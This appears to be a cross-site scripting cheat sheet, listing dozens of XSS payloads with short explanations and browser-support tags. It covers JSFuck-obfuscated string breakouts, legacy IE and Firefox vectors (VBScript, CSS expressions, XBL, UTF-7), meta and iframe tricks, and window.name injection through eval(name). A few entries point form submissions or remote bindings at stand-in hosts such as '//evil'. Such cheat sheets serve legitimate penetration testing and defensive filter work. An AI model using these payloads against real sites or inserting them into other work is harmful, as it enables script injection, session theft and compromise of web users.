';window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (window)

chrome,firefox,safari

';self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (self)

chrome,firefox,safari

';this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (this)

chrome,firefox,safari

';top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (top)

chrome,firefox,safari

';parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (parent)

chrome,firefox,safari

';frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (frames)

chrome,firefox,safari

';globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (globalThis)

chrome,firefox,safari

 
Classic vectors
<img src="javascript:alert(1)">
Image src with JavaScript protocol

<body background="javascript:alert(1)">
Body background with JavaScript protocol

<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
Iframe data urls no longer work as modern browsers use a null origin

<a href="vbscript:MsgBox+1">XSS</a> <a href="#" onclick="vbs:Msgbox+1">XSS</a> <a href="#" onclick="VBS:Msgbox+1">XSS</a> <a href="#" onclick="vbscript:Msgbox+1">XSS</a> <a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a> <a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>
VBScript protocol used to work in IE

<a href="#" onclick="jscript.compact:alert(1);">test</a> <a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScript compact was a minimal version of JS that wasn't widely used in IE

<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href=# onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
JScript.Encode allows encoded JavaScript

<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@> <iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
VBScript.Encoded allows encoded VBScript

<a title="&{alert(1)}">XSS</a>
JavaScript entities used to work in Netscape Navigator

<link href="xss.js" rel=stylesheet type="text/javascript">
JavaScript stylesheets used to be supported by Netscape Navigator

<form><button name=x formaction=x><b>stealme
Button used to consume markup

<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
IE9 select elements and plaintext used to consume markup

<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="\-\mo\z-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">
XBL Firefox only <= 2

<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22 http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings%3E)" />
XBL also worked in FF3.5 using data urls

<div style=xss:expression(alert(1))> <div style=xss:expression(1)-alert(1)> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio\006e(alert(1))> <div style=xss:expressio\00006e(alert(1))> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio&#x5c;6e(alert(1))>
CSS expressions <=IE7

<div style=xss=expression(alert(1))> <div style="color&#x3dred">test</div>
In quirks mode IE allowed you to use = instead of :

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Behaviors for older modes of IE

<script> function window.onload(){ alert(1); } </script> <script> function window::onload(){ alert(1); } </script> <script> function window.location(){ } </script> <body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body> <body> <script> function document.body.innerHTML(){ x = "<img src=1 onerror=alert(1)>"; } </script> </body>
Older versions of IE supported event handlers in functions

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
GreyMagic HTML+time exploit (no longer works even in 5 docmode)

<a href="javascript&#x6a;avascript:alert(1)">Firefox</a>
Firefox allows NULLS after &

firefox

<a href="javascript&colon;alert(1)">Firefox</a>
Firefox allows NULLs inside named entities

firefox

<!-- ><img title="--><iframe/onload=alert(1)>"> --> <!-- ><img title="--><iframe/onload=alert(1)>"> -->
Firefox allows NULL characters inside opening comments

firefox

<svg><xss onload=alert(1)>
Safari used to allow any tag to have a onload event inside SVG

safari

<isindex type=image src="//evil?
Isindex using src attribute

<isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?
Isindex using submit

<isindex type=submit formaction=javascript:alert(1)>
Isindex and formaction

<isindex type=submit action=javascript:alert(1)>
Isindex and action

<svg><discard onbegin=alert(1)>
discard tag and onbegin

chrome

<svg><use href="//example.com/use_element/upload.php#x" /></svg>
Use element with an external URL

<img src=validimage.png onloadstart=alert(1)>
onloadstart event for media elements in Firefox v107 and below

firefox

<input type=image onloadend=alert(1) src=validimage.png>
onloadend event for media elements in Firefox v107 and below

firefox

 
Special tags
<meta http-equiv="refresh" content="0; url=//example.com">
Redirect to a different domain

chrome,firefox,safari

<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Meta charset attribute UTF-7

<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Meta charset UTF-7

+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (Has to be at the start of the document) 1

+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (Has to be at the start of the document) 2

+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (Has to be at the start of the document) 3

+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (Has to be at the start of the document) 4

<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
Upgrade insecure requests

chrome,firefox,safari

<iframe sandbox src="//example.com"></iframe>
Disable JavaScript via iframe sandbox

chrome,firefox,safari

<meta name="referrer" content="no-referrer">
Disable referer

chrome,firefox,safari

 
Other attributes
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
Using srcdoc attribute

chrome,firefox,safari

<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>
Using srcdoc with entities

chrome,firefox,safari

<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>
Click a submit element from anywhere on the page, even outside the form

chrome,firefox,safari

<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Hidden inputs: Access key attributes can enable XSS on normally unexploitable elements

firefox

<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements: Access key attributes can enable XSS on normally unexploitable elements

chrome

<a href=# download="filename.html">Test</a>
Download attribute can save a copy of the current webpage

chrome,firefox,safari

<img referrerpolicy="no-referrer" src="//example.com">
Disable referrer using referrerpolicy

chrome,firefox,safari

<a href=# onclick="window.open('http://example.com/xss/xss.php?context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>
Set window.name via parameter on the window.open function

chrome,firefox,safari

<iframe name="alert(1)" src="https://example.com/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></iframe>
Set window.name via name attribute in a <iframe> tag

chrome,firefox,safari

<base target="alert(1)"><a href="http://example.com/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>
Set window.name via target attribute in a <base> tag

chrome,firefox,safari

<a target="alert(1)" href="http://example.com/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>
Set window.name via target attribute in a <a> tag

chrome,firefox,safari

<img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://example.com/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>
Set window.name via usemap attribute in a <img> tag

chrome,firefox,safari

<form action="http://example.com/xss/xss.php" target="alert(1)"><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>
Set window.name via target attribute in a <form> tag

chrome,firefox,safari

<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="http://example.com/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>
Set window.name via formtarget attribute in a <input> tag type submit

chrome,firefox,safari

<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="http://example.com/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>
Set window.name via formtarget attribute in a <input> tag type image

chrome,firefox,safari